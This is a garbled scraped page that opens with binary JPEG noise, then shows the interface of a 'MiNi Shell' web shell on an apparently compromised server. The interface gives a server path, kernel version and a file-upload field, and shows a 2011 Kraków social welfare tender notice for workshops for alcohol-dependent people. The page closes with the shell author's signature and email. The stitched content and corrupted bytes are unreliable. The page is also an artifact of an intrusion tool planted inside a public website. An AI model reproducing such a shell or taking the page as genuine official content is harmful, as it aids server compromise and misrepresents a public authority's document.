JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111103/363704-N-2011.html

<p class="kh_header"><b>Kraków: zorganizowanie i przeprowadzenie warsztatów terapeutyczno- motywacyjnych dla uczestników projektu Pora na aktywność uzależnionych od alkoholu przed podjęciem leczenia zamkniętego, podnoszących kompetencje i umiejętności społeczne.</b><br>
<b>Numer ogłoszenia: 363704 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie warsztatów terapeutyczno- motywacyjnych dla uczestników projektu Pora na aktywność uzależnionych od alkoholu przed podjęciem leczenia zamkniętego, podnoszących kompetencje i umiejętności społeczne..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  warsztatów terapeutyczno - motywacyjnych dla uczestników  projektu  Pora na aktywność uzależnionych od alkoholu przed podjęciem leczenia zamkniętego, podnoszących ich kompetencje i umiejętności społeczne, zgodnie z poniższymi wytycznymi:
 1.Ilość uczestników: 18 osób w tym:
               1)   1 osoba niepełnosprawna poruszająca się o kuli
               2)   2 osoby ze strony Zamawiającego
 2. Sposób organizacji zajęć:
1)Warsztaty prowadzone będą dla dwóch grup po max. 8 osób.
         2)Zajęcia grup będą prowadzone równolegle; 
         3)Zajęcia grupowe: 
a)zajęcia motywacyjno - terapeutyczne: 7 dni po 6 godzin dziennie, łącznie 42 godziny      dla 1 grupy, prowadzone przez terapeutę uzależnień,
b) zajęcia relaksacyjne i antystresowe - 1 godzina dziennie, łącznie 7 godzin na 1      grupę, prowadzone przez psychologa lub terapeutę uzależnień,
c)zajęcia sportowo - rehabilitacyjne dostosowane poziomem trudności do ogólnej kondycji uczestników, ich możliwości fizycznych i niepełnosprawności- 7 godzin w trakcie całego programu warsztatów, w tym min. 3 godziny na świeżym powietrzu, zajęcia na świeżym powietrzu przeprowadzane wspólnie dla dwóch grup. Zajęcia prowadzone przez trenera rekreacji ruchowej.
d)zajęcia kształcące kompetencje społeczne - uczące spędzania wolnego czasu z innymi bez alkoholu: na przykład: kalambury, wieczór gier planszowych, wieczór filmowy, karaoke, dyskoteka - np. zabawa andrzejkowa , realizująca założenia treningu zachowań abstynenckich - łącznie 10 godzin, zajęcia wspólne dla wszystkich uczestników warsztatów. Prowadzone przez psychologa lub terapeutę uzależnień lub trenera rekreacji ruchowej i psychologa lub trenera rekreacji i terapeutę.
e)trening zachowań w miejscu publicznym - 4 godziny w czasie całych zajęć dla wszystkich uczestników warsztatów łącznie, prowadzone przez trenera rekreacji ruchowej.
f)W trakcie zajęć Wykonawca zapewnia możliwość indywidualnych konsultacji z  
 psychologiem w ilości 3 godzin dla każdego uczestnika podczas całego okresu trwania     
warsztatów.
3.Tematyka zajęć:
Program będzie ukierunkowany na poradnictwo grupowe i indywidualne w zakresie motywacji do podjęcia przez uczestników zamkniętej terapii uzależnień:
1)Diagnoza uzależnienia i uzależnienie jako choroba; Rozpoznanie objawów choroby - utodiagnoza
2)Warsztat motywacyjny: podtrzymywanie motywacji, osiąganie zamierzonych celów terapii.
   3)Warsztat pracy nad bezsilnością.
   4)Warsztat pracy nad rozpoznaniem i radzeniem sobie z głodem alkoholowym .
   5)Wizerunek choroby : mechanizmy uzależnienia - mechanizm iluzji i zaprzeczania - mechanizm   
      nałogowej regulacji uczuć - mechanizm rozproszenia ja.
  6)Warsztat pracy nad uczuciami: wstyd, poczucie winy, złość.
  7)Proces zdrowienia - mapa śmierci i mapa życia - dojrzały wybór.
  8)Trening TAZA ( Asertywnych Zachowań Abstynenckich) - co najmniej. 6 godzin dla każdej grupy i elementy      treningu asertywności.
  9)Sygnały ostrzegawcze a nawrót w chorobie uzależnienia od alkoholu. Mapa własnych sygnałów.
10)Osobisty Plan Zdrowienia - w tym udział w zamkniętej terapii
11)Korzyści wynikające z zamkniętej terapii.
4.Cel zajęć:
Celem warsztatów jest podniesienie kompetencji społecznych i życiowych uczestników projektu pora na aktywność przed podjęciem leczenia zamkniętego. Po ukończeniu cyklu zajęć każdy beneficjent powinien:
1)samodzielnie podjąć decyzje o leczeniu zamkniętym
2)nabyć umiejętności rozmowy o swoim problemie;
3)rozpoznawać sygnały głodu alkoholowego i umieć nad nim zapanować ,
4)umieć odmawiać picia,
5)posiadać umiejętność niwelowania napięcia związanego z odstawieniem alkoholu
6)przyjąć krytykę nie uciekając się do alkoholu,
7)rozumieć własną bezsilność wobec alkoholu.
5. Wymogi dotyczące realizacji miejsca zamówienia:
      pensjonat/ośrodek wypoczynkowy, ośrodek szkoleniowy w    odległości do 150 km od Krakowa ( poza terenem gminy miejskiej Kraków), pozbawiony barier architektonicznych  w miejscowości charakterze turystyczno-wypoczynkowym, w pobliżu którego ( maksymalnie do 50 km)  znajduje się atrakcja turystyczna, dysponujący:
a)	1 pokojem max 2-osobowym , do którego dotarcie nie będzie wymagało pokonania schodów lub innych barier architektonicznych
b)	 salami które Wykonawca ma zapewnić dla uczestników (stołówka, sale do zajęć,      sala rekreacyjna) dostępnymi dla osoby poruszającej się o kuli. 
c)	stołówką mieszczącą się  w budynku zakwaterowania
d)	 pokojami 1, 2, 3, 4 osobowymi, z łazienkami,  pokoje winny być wyposażone w łóżka jednoosobowe wraz z kompletem pościeli, ręcznikami (2 na osobę) do każdego łóżka przynależna szafka lub minimum 1 półka w szafie na uczestnika. 
e)	 2 salami do zajęć grupowych, każda na min. 10 osób, stanowiącymi oddzielne pomieszczenie, z układem sali umożliwiającym przeprowadzenie warsztatów tj. dowolne przestawianie i ułożenie krzeseł - np. w półkole/okrąg, przestrzeń na ćwiczenia ruchowe. 
f)	Salami do zajęć wyposażonymi: w sprzęt audio - video (telewizor, video, DVD, z możliwością podłączenia laptopa, rzutnik multimedialny z ekranem, flipczart z pisakami 4 x czarny, 2x niebieski, 2x zielony, 2x czerwony oraz papierem), 1 ryza papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć; 
g)	2 pokojami do zajęć indywidualnych wyposażonymi w co najmniej w 2 krzesła i stół,
h)	 salą telewizyjną ze sprawnym sprzętem audio-video, zestawem filmów dotyczących ludzi walczących z uzależnieniem, propagujących ideę życia bez alkoholu (filmy zarówno dydaktyczne, dokumentalne jak i fabularne).
11. Wykonawca jest zobowiązany zapewnić:
1)	bilety wstępu do zwiedzanych obiektów,
2)   pokrycie kosztów  opłat parkingowych,
3)  opłatę klimatyczną,
4)  ubezpieczenie NNW oraz kosztów leczenia na kwotę min.10000zł/os,
   5)   opiekę przewodnika przy zwiedzaniu obiektów,
   6)  dojazd uczestnikom warsztatów z siedziby Zamawiającego do miejsca   szkolenia i z powrotem własnymi lub udostępnionymi przez firmę  Przewozową busami, zgodnie z obowiązującymi przepisami dot. przewozu osób. Busy mają  posiadać klimatyzację lub możliwość otwierania okien   Obowiązkiem przewoźnika jest posiadać wymagane przepisami dokumenty    m.in. licencję przewoźnika oraz zobowiązać się do podstawienia autokaru  sprawnego technicznie, posiadającego pełną dokumentacje gwarantującą  przejazd na trasie  określonej w umowie zgodnie z przepisami obowiązującymi  w Polsce, posiadać   wymagane ubezpieczenie. Kierowca jest zobowiązany do   dbania o czystość   autokaru podczas podróży, 
  7)   właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i          innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz             przepisów ustawy o Państwowej Inspekcji Sanitarnej,
    8)  oznaczenia dokumentów wytworzonych w związku z realizacją zadania,             materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z           wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie            internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx,
9)  wydanie po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z              w/w   wytycznymi,
10)  materiały szkoleniowe dla każdego uczestnika warsztatów: planu zajęć, długopisu          metalowego typu zenit, bloku biurowego 60 stron kratka A4, skryptu( max. 50 stron A4)-zbindowany zawierającego       tematy omawiane na zajęciach, wskazówki porady, z lustracjami, zawierającego miejsce na notatki, przemyślenia, wykaz  instytucji świadczących w Krakowie bezpłatną pomoc osobom uzależnionym w tym koniecznie: informacji o ośrodkach prowadzących zamkniętą terapię uzależnień, detoksykację  w promieniu 200km od Krakowa, czas oczekiwania, zasady zapisywania się, zasady przebiegu takiej terapii,
11) opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka 
 lub dowiezieniu uczestnika pobytu do przychodni/szpitala,
12)prowadzenie dokumentacji fotograficznej usługi i przekazania jej na zakończenie całej usługi do Zamawiającego. 
      13)Wykonawca zapewnia uczestnikom dostęp do kompleksu rekreacyjno - sportowego z  
       basenem i siłownią oraz sprzętu sportowo - rekreacyjnego w ośrodku lub w odległości   
      max 0,5 km od ośrodka.
14)W miejscu realizacji  zamówienia Wykonawca zapewni  pracownikom ze strony Zamawiającego  nieograniczony dostęp do komputera z dostępem do Internetu..
12. Podczas realizacji usługi Wykonawca zobowiązany jest do: prowadzenia dziennika każdych zajęć zawierający listę obecności, wymiar godzin , potwierdzenia przez beneficjentów odbioru materiałów piśmienniczych , wyżywienia oraz skryptu.
13 Wykonawca przedstawi szczegółowy program zajęć, oraz skrypt do akceptacji Zamawiającego terminie do 7 dni po podpisaniu umowy.
14  Wykonawca  zachowa w tajemnicy wszelkie dane osobowe, do których uzyskał dostęp  w  związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy   o  ochronie danych osobowych.
15.W trakcie realizacji usługi Wykonawca poinformuje uczestnika warsztatów o jego stanie, postępach i rokowaniach w sposób jasny a zarazem taktowny.
16.Wykonawca poinformuje Zamawiającego po przeszkodach w realizacji programu warsztatów leżących po stronie uczestnika lub konieczności wypisania uczestnika z warsztatów.
17.Po zakończeniu warsztatów Wykonawca  umożliwi kontakt ze specjalistami  uczestnikom warsztatów przez podanie im kompletu informacji na temat dostępnych w Krakowie bezpłatnych form pomocy osobom uzależnionym od alkoholu , wskazanie ośrodków terapeutycznych w miejscu zamieszkania uczestnika, poradni szpitali, itp.
18 Wykonawca zobowiązany jest dostarczyć polisę ubezpieczeniową potwierdzającą warunek ubezpieczenia uczestników najpóźniej  na 2 dni przed terminem     wyjazdu.
19. Koszt pobytu pracowników Zamawiającego Wykonawca jest zobowiązany uwzględnić          
      w cenie oferty. 
   20. Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez         
        Zamawiającego lub podmiot kontrolujący Zamawiającego.
   21. W pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura         
        pokojowa.
  22. Pokoje , w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu             
        wyjazdu z ośrodka.
 23.Wykonawca zorganizuje w terminie 5 dni roboczych od daty zakończenia usługi w       
      zasobach lokalowych Zamawiającego spotkania podsumowującego, podczas którego 
      przekaże      Zamawiającemu zgromadzoną dokumentację tj: listy obecności, potwierdzenia 
      odbioru   materiałów piśmienniczych, skryptu, dokumentacji fotograficznej z przebiegu      
      realizacji    usługi, przedstawi ocenę skuteczności podjętych działań w odniesieniu do 
     założonych celów.
21.Wykonawca zapewni 3 posiłki dziennie, serwis kawowy bez ograniczeń oraz suchy       prowiant na drogę powrotną. Szczegółowy jadłospis stanowi załącznik nr 1 do formularza.

III.  Termin realizacji:

Od dnia podpisania umowy do 15 grudnia 2011r. 

JADŁOSPIS ZGODNIE Z MENU NA OSOBĘ

serwis kawowy na zajęcia :
kawa - 250 ml
herbata - 250ml
woda mineralna - butelka 0,5l
soki owocowe100% (jabłkowy, pomarańczowy)w dzbankach 250 ml na osobę
ciasteczka konferencyjne - 150g na osobę


ŚNIADANIA ( na wszystkie 6 dni)
   herbata lub kawa z mlekiem 200 ml, cukier 10g, sok owocowy bez cukru 100 ml, jogurt owocowy 150g, musli 50g,  mleko 300 ml,  g, dżem 10g, ser żółty 30g , masło 5g, pomidor i ogórek świeży 75g łącznie, pieczywo (w tym pieczywo ciemne, bułki) 150g, polędwica sopocka 50g, szynka tyrolska 50g, twarożek śmietankowy 75g,  

OBIADY (każdego dnia inny zestaw):
1.	zupa pomidorowa z makaronem 400 ml, kotlet mielony, 150g, ziemniaki  200g, marchewka zasmażana  150g, banan - 1 sztuka, kompot śliwkowy- 250 ml
2.	zupa jarzynowa 400 ml, zrazy wołowe zwijane w sosie grzybowym, 200 g, ziemniaki  200g, surówka z warzyw mieszanych, 150 g, jabłko 1 szt., sok wieloowocowy - 250 ml
3.	barszcz z ziemniakami 400 ml, surówka z pomidora, cebuli i śmietany 150g, filet z kurczaka pieczony 200g (opcjonalnie dla wegetarian faszerowana papryka (farsz z ryżu, warzyw i sera) 200g, ziemniaki z wody 150g, kompot 200 ml, deser: winogrona 100g, 
4.	barszcz biały z 1  jajkiem i ziemniakami 400 ml, gulasz wołowy - 200 g, kasza jęczmienna - 150g, ogórek małosolny 150 g, ciasto -piernik - 150 g, kompot wiśniowy - 250 ml.
5.	zupa ogórkowa  z ryżem 400 ml, pierogi ruskie 300g,  budyń 200ml, butelka wody mineralnej 500 ml.
6.	krupnik z zieleniną 400 ml, kotlet rybny  200 g, ziemniaki  200g, surówka z kapusty i marchwi, 150 g, jabłko - 1szt, butelka  wody mineralnej 500 ml
7.	rosół z makaronem 400 ml, kotlet drobiowy panierowany 200 g, ziemniaki  200g, mizeria ze śmietaną 150 g, jabłko - 1szt, butelka  wody mineralnej 500 ml.

KOLACJE (każdego dnia inny zestaw)
 Do każdej kolacji: herbata lub kawa z mlekiem 200 ml, cukier 10g, pieczywo (w tym pieczywo ciemne, bułki) 150g
1  MIĘSA GRILLOWANE: karczek wieprzowy- 0,1kg,  mięso z kurczaka- 0,1kg, kiełbasa - 
     0,1 kg, Sosy (musztardowy, chrzanowy, ketchup)- 0,05kg/ łącznie, surówka  z warzyw - 
     0,15 kg, soki owocowe 200 ml, woda mineralna 200 ml
2. spaghetti - 300 g, blok szynkowy- 50g, twarożek z rzodkiewką - 150g, jajko gotowane- 1   
    szt., masło- 50g, 
3. szaszłyki (drobiowe z kurczaka/indyka i wegetariańskie, każdy z co najmniej 3    
      składników, w mięsnych mięso ma stanowić min. 50% wagi szaszłyka) 300g, kiełbasa  
     200 g. pieczone ziemniaki 200g, keczup 5g, musztarda 5g, ogórek kiszony (30g)
4.  bigos - 400 ml , ser żółty-50 g, masło -50g, blok szynkowy -50g, dżem -50g, miód -20 g,   
    pomidor 1 sztuka,
5.  kiełbaski na gorąco - 200 g, ,ser żółty - 50 g , szynka pieczona- 50 g, masło- 50 g, dżem-   
     50 g, miód - 30 g
6.  zapiekanka makaronowa z mięsem - 250g, ser żółty - 50g, kiełbasa żywiecka- 50 g,  
     ogórek świeży plasterkowany - 100, masło- 50 g,    
     gotowane- 1 szt., dżem- 50 g, miód, ogórek świeży plasterkowany - 100 g

SUCHY PROWIANT NA DROGĘ POWROTNĄ DO MIEJSCA ZAMIESZKANIA
 sok 100 % w zakręcanej butelce 330 ml., 2 bułki z szynką, serem żółtym, sałatą i pomidorem, batonik czekoladowy typu Grześki.

Serwis kawowy poza godzinami zajęć w formie udostępnienia czajnika oraz produktów  do przygotowania samodzielnie przez beneficjenta kawy lub kawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówien uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od zamówienia podstawowego, stanowiących 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>termin realizacji  zamówienia, warunki płatności, miejsce realizacji zamowienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com